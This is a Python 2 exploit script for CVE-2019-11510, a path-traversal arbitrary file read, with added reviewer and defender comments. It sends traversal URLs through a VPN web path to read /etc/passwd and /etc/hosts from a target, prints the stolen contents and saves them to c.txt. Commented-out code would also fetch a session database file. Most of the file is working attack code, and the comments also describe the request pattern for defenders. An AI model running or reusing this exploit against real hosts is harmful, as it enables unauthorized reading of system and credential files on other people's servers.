CVE-2019-11510.py
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import os
import sys
# ASCII-art banner shown once when the script starts; the text is kept exactly as published.
banner = '''
_______ ________ ___ ___ __ ___ __ __ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | |
| | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | |
| |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| |
\_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/
Any file read and admin Rce
python By jas502n
'''
print(banner)
# Check one base URL for the CVE-2019-11510 arbitrary file read (CVE number taken from
# this file's name) by requesting two well-known files through a path-traversal URL.
# Takes the base URL as a string, returns nothing, prints its findings and may write "c.txt".
# NOTE(review): the page lost this file's indentation, so the nesting below is not shown;
# in particular it cannot be told from here whether f.close() runs only when the second
# check succeeds. The print statements mean this is Python 2 code.
# Defender note: every URL built here appends a path of the form
# "dana-na/../dana/html5acc/guacamole/" + "../" segments + file path, ending with the
# query string "?/dana/html5acc/guacamole/"; that request shape is what to look for in web logs.
def etc_passwd(url):
# Files requested as evidence: index 0 for the first check, index 1 for the second.
file_read = ['/etc/passwd', '/etc/hosts']
# Both branches build the same three URLs; they differ only in whether a "/" is
# inserted between the base URL and the path. An empty url raises IndexError here.
if url[-1] == '/':
vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
# Drops the first 8 characters and the trailing "/" -- presumably the "https://" scheme,
# leaving the host; TODO confirm, an "http://" URL would lose one extra character.
output = url[8:-1]
# Built but never requested: its only use is in the commented-out block further down.
mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
else:
vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
output = url[8:]
mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
# verify=False turns off TLS certificate validation (the matching urllib3 warnings are
# silenced at the top of the file), and no timeout is passed, so an unresponsive host
# can block the script.
r1 = requests.get(vuln_url_1, verify=False)
r2 = requests.get(vuln_url_2, verify=False)
# Disabled code kept from the original: it would fetch mdb_url and append the body to a local file.
# r3 = requests.get(mdb_url, verify=False)
# print r3.status_code
# print r3.content
# file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
# file_mdb.write(r3.content)
# file.close
# Reported as vulnerable only when the first response is HTTP 200 and its body contains
# 'root:x'. A non-match prints "Not Vulnerable" but only shows that this one string test
# failed; it is not evidence that the host is patched.
if r1.status_code == 200 and 'root:x' in r1.text:
print
print url + " ---------------> Vulnerable"
# NOTE(review): the message names `output`, but the file opened below is the fixed name "c.txt".
print "Writing all files to output file " + output
print "\nExtracting " + file_read[0]
print
print vuln_url_1
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
# The full response body goes to the terminal as well as to the file.
print r1.text
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
# os.system('mkdir %s' % output)
# Overwrites "c.txt" in the current directory on every run; it holds content retrieved
# from the remote host, so treat it as sensitive. No with/try-finally guards the handle,
# so an exception between open and close leaves it open.
f = open("c.txt","wb")
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
f.write(file_read[0] + '\n\n' + r1.text+'\n')
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
# Second check: HTTP 200 and 'localhost' in the body of the file_read[1] request.
# It writes to f, so it presumably sits inside the first check -- confirm against an indented copy.
if r2.status_code == 200 and 'localhost' in r2.text:
print "Extracting " + file_read[1]
print
print vuln_url_2
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print r2.text
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
f.write(file_read[1] + '\n\n' + r2.text+'\n')
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
f.close()
# NOTE(review): presumably pairs with the 'root:x' check above -- confirm.
else:
print url + " ---------------> Not Vulnerable"
if __name__ == '__main__':
    # Script entry point: the first command-line argument is the base URL to check.
    etc_passwd(sys.argv[1])